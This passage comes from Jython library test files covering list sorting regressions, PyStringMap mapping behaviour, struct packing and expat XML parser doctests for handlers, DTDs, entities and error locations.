self.ss.addtarget(self.PCLASS, method)
check(None, 3)
check(1, 5)
check(-3, None)
check(None, None)
def test_main():
run_unittest(
StrTestCase,
ShadowStrTestCase,
)
if __name__ == "__main__":
test_main()
```
#### File: Lib/test/test_sort_jy.py
```python
from test import test_support
import unittest
class SortTest(unittest.TestCase):
def test_bug1835099(self):
a = [21469, 0, 25093, 21992, 26488, 21392, 21998, 22387, 30011, 18382, 23114, 24329, 29505, 24637, 22922, 24258, 19705, 17497, 16693, 20602, 24780, 14618, 18200, 18468, 24491, 20448, 16797, 25276, 27262, 134009, 132609, 135000, 133027, 133957, 134209, 136300, 135505, 137629, 137364, 136698, 136705, 135020, 138258, 136820, 136502, 140408, 140861, 152317, 150993, 144857, 137562, 138705, 138811, 137456, 138393, 138521, 140876, 140271, 141384, 139595, 141839, 141237, 140742, 140514, 141127, 141411, 141501]
a_set = set(a)
a_sorted = sorted(a)
a_sorted_set = set(a_sorted)
if a_sorted_set != a_set:
print 'list elements changed during sort:'
print 'removed', tuple(a_set - a_sorted_set)
print 'added', tuple(a_sorted_set - a_set)
assert len(a_set - a_sorted_set) == len(a_sorted_set - a_set) == 0
def test_bug1767(self):
'Test bug 1767 sorting when __cmp__ inconsistent with __eq__'
class Tricky:
def __init__(self, pair):
self.key0, self.key1 = pair
def __cmp__(self, other):
# Duplicates standard sort for pairs
if self.key0 != other.key0:
return cmp(self.key0, other.key0)
return cmp(self.key1, other.key1)
def __eq__(self,other):
# Compare only on second key: inconsistent with __cmp__()==0
return self.key1 == other.key1
def __repr__(self):
return "(%d, %d)" %(self.key0, self.key1)
def slowSorted(qq) :
'Reference sort performed by insertion using only <'
rr = list()
for q in qq :
i = 0
for i in range(len(rr)) :
if q < rr[i] :
rr.insert(i,q)
break
else :
rr.append(q)
return rr
def check(trick, answer):
'Check list of Tricky matches list of pairs in order'
assert len(trick)==len(answer)
for t, a in zip(trick,answer) :
# print q, a
assert t.key0==a[0] and t.key1==a[1]
# Test material
question = [(2, 5), (1, 3), (3, 0), (2, 3), (1, 1), (2, 3),
(3, 5), (1, 0), (2, 0), (2, 1), (1, 4), (2, 5),
(1, 1), (3, 5), (2, 5), (1, 0), (3, 2), (1, 1),
(2, 2), (2, 2), (1, 0), (2, 3), (2, 1), (3, 2)]
answer = slowSorted(question)
# Test library function
que = [Tricky(p) for p in question]
que.sort()
check(que, answer)
# Test library function in reverse
que = [Tricky(p) for p in question]
que.sort(reverse=True)
check(que, list(reversed(answer)))
def test_main():
test_support.run_unittest(SortTest)
if __name__ == "__main__":
test_main()
```
#### File: Lib/test/test_stringmap.py
```python
import unittest
from test import test_support
from test_userdict import TestMappingProtocol
from org.python.core import PyStringMap
class SimpleClass:
pass
class StringMapTest(TestMappingProtocol):
_tested_class = None
class ClassDictTests(StringMapTest):
"""Check that class dicts conform to the mapping protocol"""
def _empty_mapping(self):
for key in SimpleClass.__dict__.copy():
SimpleClass.__dict__.pop(key)
return SimpleClass.__dict__
class InstanceDictTests(StringMapTest):
def _empty_mapping(self):
return SimpleClass().__dict__
class PyStringMapTest(StringMapTest):
_tested_class = PyStringMap
def test_all(self):
d = PyStringMap()
# Test __setitem__
d["one"] = 1
# Test __getitem__
self.assertEqual(d["one"], 1)
self.assertRaises(KeyError, d.__getitem__, "two")
# Test __delitem__
del d["one"]
self.assertRaises(KeyError, d.__delitem__, "one")
# Test clear
d.update(self._reference())
d.clear()
self.assertEqual(d, {})
# Test copy()
d.update(self._reference())
da = d.copy()
self.assertEqual(d, da)
# Test keys, items, values
r = self._reference()
d.update(self._reference())
for k in d.keys():
self.failUnless(k in r.keys())
for i in d.items():
self.failUnless(i in r.items())
for v in d.values():
self.failUnless(v in r.values())
# Test has_key and "in".
for i in r.keys():
self.assert_(d.has_key(i))
self.assert_(i in d)
# Test unhashability
self.assertRaises(TypeError, hash, d)
def test_stringmap_in_mapping(self):
class A:
def __init__(self):
self.a = "a"
self.assertEquals("a", "%(a)s" % A().__dict__)
def test_main():
test_support.run_unittest(
ClassDictTests,
InstanceDictTests,
PyStringMapTest
)
if __name__ == "__main__":
test_main()
```
#### File: Lib/test/test_struct_jy.py
```python
import unittest
from test import test_support
import struct
import sys
ISBIGENDIAN = sys.byteorder == "big"
class StructTests(unittest.TestCase): # (format, argument, big-endian result, little-endian result, asymmetric)
_tests = [
('c', 'a', 'a', 'a', 0),
('xc', 'a', '\0a', '\0a', 0),
('cx', 'a', 'a\0', 'a\0', 0),
('s', 'a', 'a', 'a', 0),
('0s', 'helloworld', '', '', 1),
('1s', 'helloworld', 'h', 'h', 1),
('9s', 'helloworld', 'helloworl', 'helloworl', 1),
('10s', 'helloworld', 'helloworld', 'helloworld', 0),
('11s', 'helloworld', 'helloworld\0', 'helloworld\0', 1),
('20s', 'helloworld', 'helloworld'+10*'\0', 'helloworld'+10*'\0', 1),
('b', 7, '\7', '\7', 0),
('b', -7, '\371', '\371', 0),
('B', 7, '\7', '\7', 0),
('B', 249, '\371', '\371', 0),
('h', 700, '\002\274', '\274\002', 0),
('h', -700, '\375D', 'D\375', 0),
('H', 700, '\002\274', '\274\002', 0),
('H', 0x10000-700, '\375D', 'D\375', 0),
('i', 70000000, '\004,\035\200', '\200\035,\004', 0),
('i', -70000000, '\373\323\342\200', '\200\342\323\373', 0),
('I', 70000000L, '\004,\035\200', '\200\035,\004', 0),
('I', 0x100000000L-70000000, '\373\323\342\200', '\200\342\323\373', 0),
('l', 70000000, '\004,\035\200', '\200\035,\004', 0),
('l', -70000000, '\373\323\342\200', '\200\342\323\373', 0),
('L', 70000000L, '\004,\035\200', '\200\035,\004', 0),
('L', 0x100000000L-70000000, '\373\323\342\200', '\200\342\323\373', 0),
('f', 2.0, '@\000\000\000', '\000\000\000@', 0),
('d', 2.0, '@\000\000\000\000\000\000\000',
'\000\000\000\000\000\000\000@', 0),
('f', -2.0, '\300\000\000\000', '\000\000\000\300', 0),
('d', -2.0, '\300\000\000\000\000\000\000\000',
'\000\000\000\000\000\000\000\300', 0),
]
def test_struct(self):
for fmt, arg, big, lil, asy in self._tests:
for (xfmt, exp) in [('>'+fmt, big), ('!'+fmt, big), ('<'+fmt, lil),
('='+fmt, ISBIGENDIAN and big or lil)]:
res = struct.pack(xfmt, arg)
self.assertEqual(res,exp,msg="pack(%r, %r) -> %r # expected %r" %
(fmt, arg, res, exp))
n=struct.calcsize(xfmt)
self.assertEqual(n, len(res),msg="calcsize(%r) -> %d # expected %d" %
(xfmt, n, len(res)))
rev = struct.unpack(xfmt, res)[0]
if asy:
self.assertNotEqual(arg,rev,msg="unpack(%r, %r) -> (%r,) # expected (%r,)" %
(fmt, res, rev, exp))
else:
self.assertEqual(arg,rev,msg="unpack(%r, %r) -> (%r,) # expected (%r,)" %
(fmt, res, rev, arg))
def test_struct_unpack_bytearray(self):
for fmt, arg, big, lil, asy in self._tests:
for (xfmt, exp) in [('>'+fmt, big), ('!'+fmt, big), ('<'+fmt, lil),
('='+fmt, ISBIGENDIAN and big or lil)]:
res = struct.pack(xfmt, arg)
self.assertEqual(res,exp,msg="pack(%r, %r) -> %r # expected %r" %
(fmt, arg, res, exp))
n=struct.calcsize(xfmt)
self.assertEqual(n, len(res),msg="calcsize(%r) -> %d # expected %d" %
(xfmt, n, len(res)))
rev = struct.unpack(xfmt, bytearray(res))[0]
if asy:
self.assertNotEqual(arg,rev,msg="unpack(%r, %r) -> (%r,) # expected (%r,)" %
(fmt, res, rev, exp))
else:
self.assertEqual(arg,rev,msg="unpack(%r, %r) -> (%r,) # expected (%r,)" %
(fmt, res, rev, arg))
def test_struct_unpack_buffer(self):
for fmt, arg, big, lil, asy in self._tests:
for (xfmt, exp) in [('>'+fmt, big), ('!'+fmt, big), ('<'+fmt, lil),
('='+fmt, ISBIGENDIAN and big or lil)]:
res = struct.pack(xfmt, arg)
self.assertEqual(res,exp,msg="pack(%r, %r) -> %r # expected %r" %
(fmt, arg, res, exp))
n=struct.calcsize(xfmt)
self.assertEqual(n, len(res),msg="calcsize(%r) -> %d # expected %d" %
(xfmt, n, len(res)))
rev = struct.unpack(xfmt, buffer(res))[0]
if asy:
self.assertNotEqual(arg,rev,msg="unpack(%r, %r) -> (%r,) # expected (%r,)" %
(fmt, res, rev, exp))
else:
self.assertEqual(arg,rev,msg="unpack(%r, %r) -> (%r,) # expected (%r,)" %
(fmt, res, rev, arg))
def test_struct_unpack_from(self):
for fmt, arg, big, lil, asy in self._tests:
for (xfmt, exp) in [('>'+fmt, big), ('!'+fmt, big), ('<'+fmt, lil),
('='+fmt, ISBIGENDIAN and big or lil)]:
res = struct.pack(xfmt, arg)
self.assertEqual(res,exp,msg="pack(%r, %r) -> %r # expected %r" %
(fmt, arg, res, exp))
n=struct.calcsize(xfmt)
self.assertEqual(n, len(res),msg="calcsize(%r) -> %d # expected %d" %
(xfmt, n, len(res)))
rev = struct.unpack_from(xfmt, res)[0]
if asy:
self.assertNotEqual(arg,rev,msg="unpack(%r, %r) -> (%r,) # expected (%r,)" %
(fmt, res, rev, exp))
else:
self.assertEqual(arg,rev,msg="unpack(%r, %r) -> (%r,) # expected (%r,)" %
(fmt, res, rev, arg))
def test_struct_unpack_from_bytearray(self):
for fmt, arg, big, lil, asy in self._tests:
for (xfmt, exp) in [('>'+fmt, big), ('!'+fmt, big), ('<'+fmt, lil),
('='+fmt, ISBIGENDIAN and big or lil)]:
res = struct.pack(xfmt, arg)
self.assertEqual(res,exp,msg="pack(%r, %r) -> %r # expected %r" %
(fmt, arg, res, exp))
n=struct.calcsize(xfmt)
self.assertEqual(n, len(res),msg="calcsize(%r) -> %d # expected %d" %
(xfmt, n, len(res)))
rev = struct.unpack_from(xfmt, bytearray(res))[0]
if asy:
self.assertNotEqual(arg,rev,msg="unpack(%r, %r) -> (%r,) # expected (%r,)" %
(fmt, res, rev, exp))
else:
self.assertEqual(arg,rev,msg="unpack(%r, %r) -> (%r,) # expected (%r,)" %
(fmt, res, rev, arg))
def test_struct_unpack_from_buffer(self):
for fmt, arg, big, lil, asy in self._tests:
for (xfmt, exp) in [('>'+fmt, big), ('!'+fmt, big), ('<'+fmt, lil),
('='+fmt, ISBIGENDIAN and big or lil)]:
res = struct.pack(xfmt, arg)
self.assertEqual(res,exp,msg="pack(%r, %r) -> %r # expected %r" %
(fmt, arg, res, exp))
n=struct.calcsize(xfmt)
self.assertEqual(n, len(res),msg="calcsize(%r) -> %d # expected %d" %
(xfmt, n, len(res)))
rev = struct.unpack_from(xfmt, buffer(res))[0]
if asy:
self.assertNotEqual(arg,rev,msg="unpack(%r, %r) -> (%r,) # expected (%r,)" %
(fmt, res, rev, exp))
else:
self.assertEqual(arg,rev,msg="unpack(%r, %r) -> (%r,) # expected (%r,)" %
(fmt, res, rev, arg))
def test_main():
test_support.run_unittest(__name__)
if __name__ == "__main__":
test_main()
```
#### File: Lib/test/test_xml_etree_jy.py
```python
import sys
JYTHON = sys.platform.startswith("java")
import doctest
from test import test_support
import xml.parsers.expat as expat
from xml.etree.ElementTree import *
def jython(function):
if JYTHON:
return function
else:
return None
class sortdict(dict):
def __repr__(self):
items = self.items()
items.sort()
pairs = ["%r: %r" % pair for pair in items]
return "{%s}" % ", ".join(pairs)
__str__ = __repr__
class Outputter:
def StartElementHandler(self, name, attrs):
print 'Start element:\n ', repr(name), sortdict(attrs)
def EndElementHandler(self, name):
print 'End element:\n ', repr(name)
def CharacterDataHandler(self, data):
data = data.strip()
if data:
print 'Character data:'
print ' ', repr(data)
def ProcessingInstructionHandler(self, target, data):
print 'PI:\n ', repr(target), repr(data)
def StartNamespaceDeclHandler(self, prefix, uri):
print 'NS decl:\n ', repr(prefix), repr(uri)
def EndNamespaceDeclHandler(self, prefix):
print 'End of NS decl:\n ', repr(prefix)
def StartCdataSectionHandler(self):
print 'Start of CDATA section'
def EndCdataSectionHandler(self):
print 'End of CDATA section'
def CommentHandler(self, text):
print 'Comment:\n ', repr(text)
def NotationDeclHandler(self, *args):
name, base, sysid, pubid = args
print 'Notation declared:', args
def UnparsedEntityDeclHandler(self, *args):
entityName, base, systemId, publicId, notationName = args
print 'Unparsed entity decl:\n ', args
def NotStandaloneHandler(self, userData):
print 'Not standalone'
return 1
def ExternalEntityRefHandler(self, *args):
context, base, sysId, pubId = args
print 'External entity ref:', args[1:]
return 1
def DefaultHandler(self, userData):
pass
def DefaultHandlerExpand(self, userData):
pass
_= """
>>> data = '''\
... <?xml version="1.0" encoding="iso-8859-1" standalone="no"?>
... <?xml-stylesheet href="stylesheet.css"?>
... <!-- comment data -->
... <!DOCTYPE quotations SYSTEM "quotations.dtd" [
... <!ELEMENT root ANY>
... <!NOTATION notation SYSTEM "notation.jpeg">
... <!ENTITY acirc "â">
... <!ENTITY external_entity SYSTEM "entity.file">
... <!ENTITY unparsed_entity SYSTEM "entity.file" NDATA notation>
... %unparsed_entity;
... ]>
...
... <root attr1="value1" attr2="value2ὀ">
... <myns:subelement xmlns:myns="http://www.python.org/namespace">
... Contents of subelements
... </myns:subelement>
... <sub2><![CDATA[contents of CDATA section]]></sub2>
... &external_entity;
... </root>
... '''
"""
def test_utf8():
"""
Source: test_pyexpat.py
Changes: replaced tabs with spaces in Outputter to ease doctest integration
>>> out = Outputter()
>>> parser = expat.ParserCreate(namespace_separator='!')
>>> HANDLER_NAMES = [
... 'StartElementHandler', 'EndElementHandler',
... 'CharacterDataHandler',
... 'ProcessingInstructionHandler',
... 'UnparsedEntityDeclHandler', 'NotationDeclHandler',
... 'StartNamespaceDeclHandler', 'EndNamespaceDeclHandler',
... 'CommentHandler', 'StartCdataSectionHandler',
... 'EndCdataSectionHandler',
... 'DefaultHandler', 'DefaultHandlerExpand',
... #'NotStandaloneHandler',
... 'ExternalEntityRefHandler'
... ]
>>> for name in HANDLER_NAMES:
... setattr(parser, name, getattr(out, name))
>>> data = '''\\
... <?xml version="1.0" encoding="iso-8859-1" standalone="no"?>
... <?xml-stylesheet href="stylesheet.css"?>
... <!-- comment data -->
... <!DOCTYPE quotations SYSTEM "quotations.dtd" [
... <!ELEMENT root ANY>
... <!NOTATION notation SYSTEM "notation.jpeg">
... <!ENTITY acirc "â">
... <!ENTITY external_entity SYSTEM "entity.file">
... <!ENTITY unparsed_entity SYSTEM "entity.file" NDATA notation>
... %unparsed_entity;
... ]>
...
... <root attr1="value1" attr2="value2ὀ">
... <myns:subelement xmlns:myns="http://www.python.org/namespace">
... Contents of subelements
... </myns:subelement>
... <sub2><![CDATA[contents of CDATA section]]></sub2>
... &external_entity;
... </root>
... '''
#Produce UTF-8 output
#>>> parser.returns_unicode = 0
#>>> try:
#... parser.Parse(data, 1)
#... except expat.error:
#... print '** Error', parser.ErrorCode, expat.ErrorString(parser.ErrorCode)
#... print '** Line', parser.ErrorLineNumber
#... print '** Column', parser.ErrorColumnNumber
#... print '** Byte', parser.ErrorByteIndex
#PI:
#'xml-stylesheet' 'href="stylesheet.css"'
#Comment:
#' comment data '
#Notation declared: ('notation', None, 'notation.jpeg', None)
#Unparsed entity decl:
#('unparsed_entity', None, 'entity.file', None, 'notation')
#Start element:
#'root' {'attr1': 'value1', 'attr2': 'value2\\xe1\\xbd\\x80'}
#NS decl:
#'myns' 'http://www.python.org/namespace'
#Start element:
#'http://www.python.org/namespace!subelement' {}
#Character data:
#'Contents of subelements'
#End element:
#'http://www.python.org/namespace!subelement'
#End of NS decl:
#'myns'
#Start element:
#'sub2' {}
#Start of CDATA section
#Character data:
#'contents of CDATA section'
#End of CDATA section
#End element:
#'sub2'
#External entity ref: (None, 'entity.file', None)
#End element:
#'root'
#1
>>> parser = expat.ParserCreate(namespace_separator='!')
>>> parser.returns_unicode = 1
>>> for name in HANDLER_NAMES:
... setattr(parser, name, getattr(out, name))
>>> try:
... parser.Parse(data, 1)
... except expat.error:
... print '** Line', parser.ErrorLineNumber
... print '** Column', parser.ErrorColumnNumber
... print '** Byte', parser.ErrorByteIndex #doctest: +REPORT_UDIFF
PI:
u'xml-stylesheet' u'href="stylesheet.css"'
Comment:
u' comment data '
Notation declared: (u'notation', None, u'notation.jpeg', None)
Unparsed entity decl:
(u'unparsed_entity', None, u'entity.file', None, u'notation')
Start element:
u'root' {u'attr1': u'value1', u'attr2': u'value2\u1f40'}
NS decl:
u'myns' u'http://www.python.org/namespace'
Start element:
u'http://www.python.org/namespace!subelement' {}
Character data:
u'Contents of subelements'
End element:
u'http://www.python.org/namespace!subelement'
End of NS decl:
u'myns'
Start element:
u'sub2' {}
Start of CDATA section
Character data:
u'contents of CDATA section'
End of CDATA section
End element:
u'sub2'
External entity ref: (None, u'entity.file', None)
End element:
u'root'
1
"""
def test_import_as_pyexpat():
"""
>>> import pyexpat as expat
>>> expat #doctest: +ELLIPSIS
<module 'pyexpat' from ...>
"""
def test_errors_submodule():
"""
>>> import xml.parsers.expat as expat
>>> expat.errors
<module 'pyexpat.errors' (built-in)>
>>> dir(expat.errors) #doctest: +ELLIPSIS
['XML_ERROR_ABORTED', ..., 'XML_ERROR_XML_DECL', '__doc__', '__name__']
>>> expat.errors.XML_ERROR_ABORTED
'parsing aborted'
>>> expat.errors.XML_ERROR_XML_DECL
'XML declaration not well-formed'
"""
def test_model_submodule():
"""
>>> import xml.parsers.expat as expat
>>> expat.model
<module 'pyexpat.model' (built-in)>
>>> print sortdict(expat.model.__dict__)
{'XML_CQUANT_NONE': 0, 'XML_CQUANT_OPT': 1, 'XML_CQUANT_PLUS': 3, 'XML_CQUANT_REP': 2, 'XML_CTYPE_ANY': 2, 'XML_CTYPE_CHOICE': 5, 'XML_CTYPE_EMPTY': 1, 'XML_CTYPE_MIXED': 3, 'XML_CTYPE_NAME': 4, 'XML_CTYPE_SEQ': 6, '__doc__': 'Constants used to interpret content model information.', '__name__': 'pyexpat.model'}
"""
def test_parse_only_xml_data():
"""
Source: test_pyexpat.py, see also: http://python.org/sf/1296433
Changes:
- replaced 'iso8859' encoding with 'ISO-8859-1',
- added isfinal=True keyword argument to Parse call (as in this port,
the data is not processed until it is fully available).
With these changes, the test still crashes CPython 2.5.
>>> import xml.parsers.expat as expat
>>> # xml = "<?xml version='1.0' encoding='iso8859'?><s>%s</s>" % ('a' * 1025)
This one doesn't crash:
>>> xml = "<?xml version='1.0'?><s>%s</s>" % ('a' * 10000)
>>> def handler(text):
... raise Exception
>>> parser = expat.ParserCreate()
>>> parser.CharacterDataHandler = handler
>>> try:
... parser.Parse(xml, True)
... except:
... pass
"""
def test_namespace_separator():
"""
Source: test_pyexpat.py
Tests that make sure we get errors when the namespace_separator value
is illegal, and that we don't for good values:
>>> from xml.parsers.expat import ParserCreate
>>> p = ParserCreate()
>>> p = ParserCreate(namespace_separator=None)
>>> p = ParserCreate(namespace_separator=' ')
>>> p = ParserCreate(namespace_separator=42) #doctest: +ELLIPSIS
Traceback (most recent call last):
...
TypeError: ...
>>> p = ParserCreate(namespace_separator='too long') #doctest: +ELLIPSIS
Traceback (most recent call last):
...
ValueError: ...
ParserCreate() needs to accept a namespace_separator of zero length
to satisfy the requirements of RDF applications that are required
to simply glue together the namespace URI and the localname. Though
considered a wart of the RDF specifications, it needs to be supported.
See XML-SIG mailing list thread starting with
http://mail.python.org/pipermail/xml-sig/2001-April/005202.html
>>> p = ParserCreate(namespace_separator='') # too short
"""
def test_interning_machinery():
"""
Source: test_pyexpat.py
>>> from xml.parsers.expat import ParserCreate
>>> p = ParserCreate()
>>> L = []
>>> def collector(name, *args):
... L.append(name)
>>> p.StartElementHandler = collector
>>> p.EndElementHandler = collector
>>> p.Parse("<e> <e/> <e></e> </e>", 1)
1
>>> tag = L[0]
>>> len(L)
6
>>> all(tag is entry for entry in L)
True
"""
def test_exception_from_callback():
"""
Source: test_pyexpat.py
>>> from xml.parsers.expat import ParserCreate
>>> def StartElementHandler(name, attrs):
... raise RuntimeError(name)
>>> parser = ParserCreate()
>>> parser.StartElementHandler = StartElementHandler
>>> try:
... parser.Parse("<a><b><c/></b></a>", 1)
... except RuntimeError, e:
... pass
>>> e.args[0] == "a"
True
"""
def test_with_and_without_namespace():
"""
>>> from xml.parsers.expat import ParserCreate
>>> xml = '''<root
... xmlns="http://www.python.org"
... xmlns:python="http://www.python.org"
... python:a="1" b="2">
... <python:sub1/>
... <sub2 xmlns=""/>
... </root>'''
>>> def handler(name, attributes):
... attributes = sorted(attributes.items())
... print name
... for attr in attributes:
... print " %s = %r" % attr
>>> parser = ParserCreate()
>>> parser.StartElementHandler = handler
>>> _ = parser.Parse(xml, True)
root
b = u'2'
python:a = u'1'
xmlns = u'http://www.python.org'
xmlns:python = u'http://www.python.org'
python:sub1
sub2
xmlns = u''
>>> parser = ParserCreate(namespace_separator="|")
>>> parser.StartElementHandler = handler
>>> _ = parser.Parse(xml, True)
http://www.python.org|root
b = u'2'
http://www.python.org|a = u'1'
http://www.python.org|sub1
sub2
"""
def test_unicode_bug():
"""
Regression introduced by revision 28
>>> doc = XML("<doc>舰</doc>")
>>> doc.text
u'\u8230'
"""
def test_DTD():
"""
>>> xml = '''<!DOCTYPE doc [
... <!ELEMENT doc (any|empty|text|mixed|opt|many|plus)>
... <!ELEMENT any ANY>
... <!ELEMENT empty EMPTY>
... <!ELEMENT text (#PCDATA)>
... <!ELEMENT sequence (_sequence)>
... <!ELEMENT _sequence (any,any)>
... <!ELEMENT mixed (#PCDATA|any)*>
... <!ELEMENT opt (empty)?>
... <!ELEMENT many (empty)*>
... <!ELEMENT plus (empty)+>
... ]>
... <doc><text>content</text></doc>
... '''
>>> parser = expat.ParserCreate()
>>> def handler(header, *args):
... def _handler(*args):
... print header + ":", args
... return _handler
>>> parser.ElementDeclHandler = handler("ELEMENT")
>>> parser.AttlistDeclHandler = handler("ATTRIBUTE")
>>> parser.EntityDeclHandler = handler("ENTITY")
>>> parser.NotationDeclHandler = handler("NOTATION")
>>> parser.UnparsedEntityDeclHandler = handler("UNPARSED")
>>> parser.Parse(xml, True)
ELEMENT: (u'doc', (5, 0, None, ((4, 0, u'any', ()), (4, 0, u'empty', ()), (4, 0, u'text', ()), (4, 0, u'mixed', ()), (4, 0, u'opt', ()), (4, 0, u'many', ()), (4, 0, u'plus', ()))))
ELEMENT: (u'any', (2, 0, None, ()))
ELEMENT: (u'empty', (1, 0, None, ()))
ELEMENT: (u'text', (3, 0, None, ()))
ELEMENT: (u'sequence', (6, 0, None, ((4, 0, u'_sequence', ()),)))
ELEMENT: (u'_sequence', (6, 0, None, ((4, 0, u'any', ()), (4, 0, u'any', ()))))
ELEMENT: (u'mixed', (3, 2, None, ((4, 0, u'any', ()),)))
ELEMENT: (u'opt', (6, 1, None, ((4, 0, u'empty', ()),)))
ELEMENT: (u'many', (6, 2, None, ((4, 0, u'empty', ()),)))
ELEMENT: (u'plus', (6, 3, None, ((4, 0, u'empty', ()),)))
1
"""
def test_entity():
"""
TODO: need a fallback for entity-resolver so that empty source is returned.
>>> xml = ''' <!DOCTYPE doc SYSTEM "external.dtd" [
... <!ENTITY ext-entity SYSTEM "external-entity">
... ]>
... <doc>&ext-entity;&in-ext-dtd-entity;</doc>'''
>>> parser = expat.ParserCreate()
>>> parser.Parse(xml, True)
1
EXPAT OH MY ! When applicable (internal entities), the CharacterDataHandler
callback will override DefaultHandlerExpand, but it WON'T override
DefaultHandler. On the other hand, the DefaultHandlerExpand callback WILL
override DefaultHandler ... More tests todo here ...
>>> xml = '''<!DOCTYPE doc SYSTEM "external.dtd" [
... <!ENTITY ext-entity SYSTEM "external-entity">
... <!ENTITY int-entity "internal">
... ]>
... <doc>&int-entity;&ext-entity;&in-ext-dtd-entity;</doc>'''
>>> parser = expat.ParserCreate()
>>> def handler(header):
... def _handler(*args):
... print header + ":", args
... return 1
... return _handler
>>> parser.CharacterDataHandler = handler("text")
>>> parser.DefaultHandler = handler("default")
>>> parser.Parse(xml, True) #doctest: +ELLIPSIS
default: ...
default: (u'&int-entity;',)
default: (u'&ext-entity;',)
default: (u'&in-ext-dtd-entity;',)
...
1
EXPAT OH MY ! When applicable (internal entities), the CharacterDataHandler
callback will override DefaultHandlerExpand, but it WON'T override
DefaultHandler. On the other hand, the DefaultHandlerExpand callback WILL
override DefaultHandler ... More tests todo here ...
"""
def test_resolve_entity_handlers():
"""
>>> xml = '''<!DOCTYPE doc [
... <!ENTITY entity SYSTEM "entity">
... ]>
... <doc>&entity;</doc>'''
>>> def handler(header):
... def _handler(*args):
... print header + ":", args
... return 1
... return _handler
>>> parser = expat.ParserCreate()
>>> parser.ExternalEntityRefHandler = handler("ExternalEntityRefHandler")
>>> parser.Parse(xml, True)
ExternalEntityRefHandler: (u'entity', None, u'entity', None)
1
"""
def handler(name, header="XML>", returns=None):
def _handler(*args):
if len(args) == 1:
args = "(%r)" % args[0]
else:
args = str(args)
print header, name + "%s" % args
return returns
return _handler
def parse(xml, *handlers):
parser = expat.ParserCreate()
for name in handlers:
if name == "ExternalEntityRefHandler":
returns = 1
else:
returns = None
setattr(parser, name, handler(name, returns=returns))
parser.Parse(xml, True)
def test_internal_entities():
"""
>>> xml = '''<!DOCTYPE doc [
... <!ENTITY entity "entity-content">
... ]>
... <doc>&entity;</doc>'''
>>> parse(xml)
>>> parse(xml, "CharacterDataHandler")
XML> CharacterDataHandler(u'entity-content')
>>> parse(xml, "DefaultHandler") #doctest: +ELLIPSIS
XML> ...DefaultHandler(u'&entity;')...
>>> parse(xml, "DefaultHandlerExpand") #doctest: +ELLIPSIS
XML> ...DefaultHandlerExpand(u'entity-content')...
# Uhu ?
>>> parse(xml, "CharacterDataHandler",
... "DefaultHandler") #doctest: +ELLIPSIS
XML> ...DefaultHandler(u'&entity;')...
>>> parse(xml, "CharacterDataHandler",
... "DefaultHandlerExpand") #doctest: +ELLIPSIS
XML> ...CharacterDataHandler(u'entity-content')...
>>> parse(xml, "DefaultHandler",
... "DefaultHandlerExpand") #doctest: +ELLIPSIS
XML> ...DefaultHandlerExpand(u'entity-content')...
>>> parse(xml, "CharacterDataHandler",
... "DefaultHandler",
... "DefaultHandlerExpand") #doctest: +ELLIPSIS
XML> ...CharacterDataHandler(u'entity-content')...
"""
def test_external_entities():
"""
>>> xml = '''<!DOCTYPE doc [
... <!ENTITY entity PUBLIC "http://entity-web" "entity-file">
... ]>
... <doc>&entity;</doc>'''
>>> parse(xml)
>>> parse(xml, "ExternalEntityRefHandler")
XML> ExternalEntityRefHandler(u'entity', None, u'entity-file', u'http://entity-web')
>>> parse(xml, "DefaultHandler") #doctest: +ELLIPSIS
XML> ...DefaultHandler(u'&entity;')...
>>> parse(xml, "DefaultHandlerExpand") #doctest: +ELLIPSIS
XML> ...DefaultHandlerExpand(u'&entity;')...
>>> parse(xml, "ExternalEntityRefHandler",
... "DefaultHandler") #doctest: +ELLIPSIS
XML> ...ExternalEntityRefHandler(u'entity', None, u'entity-file', u'http://entity-web')...
>>> parse(xml, "ExternalEntityRefHandler",
... "DefaultHandlerExpand") #doctest: +ELLIPSIS
XML> ...ExternalEntityRefHandler(u'entity', None, u'entity-file', u'http://entity-web')...
>>> parse(xml, "DefaultHandler",
... "DefaultHandlerExpand") #doctest: +ELLIPSIS
XML> ...DefaultHandlerExpand(u'&entity;')...
>>> parse(xml, "ExternalEntityRefHandler",
... "DefaultHandler",
... "DefaultHandlerExpand") #doctest: +ELLIPSIS
XML> ...ExternalEntityRefHandler(u'entity', None, u'entity-file', u'http://entity-web')...
"""
def test_undefined_entities():
"""
>>> xml = "<doc>&entity;</doc>"
>>> parse(xml)
Traceback (most recent call last):
...
ExpatError: undefined entity: line 1, column 5
"""
def locate(parser, name):
def _handler(*args):
print name, parser.CurrentLineNumber, parser.CurrentColumnNumber
return _handler
def test_current_location():
"""
>>> xml = '''<doc>text<tag/>text<tag></tag>
... <tag></tag>
... text<tag/>
... </doc>'''
>>> parser = expat.ParserCreate()
>>> parser.CharacterDataHandler = locate(parser, "TEXT:")
>>> parser.StartElementHandler = locate(parser, "START:")
>>> parser.EndElementHandler = locate(parser, "END:")
>>> _ = parser.Parse(xml, True) #doctest: +ELLIPSIS
START: 1 0
TEXT: 1 5...
START: 1 9
END: 1 15
TEXT: 1 15...
START: 1 19
END: 1 24
TEXT: 1 30...
START: 2 0
END: 2 5
TEXT: 2 11...
START: 3 4
END: 3 10
TEXT: 3 10...
END: 4 0
>>> xml = '''<doc>
... start tag after some text<tag/>
... <elt></elt><tag/>
... <elt/><tag/>
... </doc>'''
>>> parser = expat.ParserCreate()
>>> parser.CharacterDataHandler = locate(parser, "TEXT:")
>>> parser.StartElementHandler = locate(parser, "START:")
>>> parser.EndElementHandler = locate(parser, "END:")
>>> _ = parser.Parse(xml, True) #doctest: +ELLIPSIS
START: 1 0
TEXT: 1 5...
START: 2 25
END: 2 31
TEXT: 2 31...
START: 3 0
END: 3 5
START: 3 11
END: 3 17
TEXT: 3 17...
START: 4 0
END: 4 6
START: 4 6
END: 4 12
TEXT: 4 12...
END: 5 0
"""
def test_error_location():
"""
Source: selftest.py, ElementTree 1.3a3
Changes: removed dependencies in ElementTree, added one extra test
>>> def error(xml):
... p = expat.ParserCreate()
... try:
... p.Parse(xml, True)
... except expat.ExpatError, e:
... return e.lineno, e.offset
>>> error("foo")
(1, 0)
>>> error("<tag>&foo;</tag>")
(1, 5)
>>> error("foobar<")
(1, 6)
>>> error("<doc>text<doc")
(1, 9)
"""
@jython
def test_resolveEntity():
"""
# TODO: test that 'skipEntity' works.
>>> # Jython
>>> from org.python.core.util import StringUtil
>>> from jarray import array
>>> # Java Standard Edition
>>> from org.xml.sax import *
>>> from org.xml.sax.ext import *
>>> from org.xml.sax.helpers import *
>>> from java.io import ByteArrayInputStream
>>> xml = '''<!DOCTYPE doc
... [<!ENTITY entity SYSTEM "entity-file">
... ]>
... <doc>&entity;</doc>
... '''
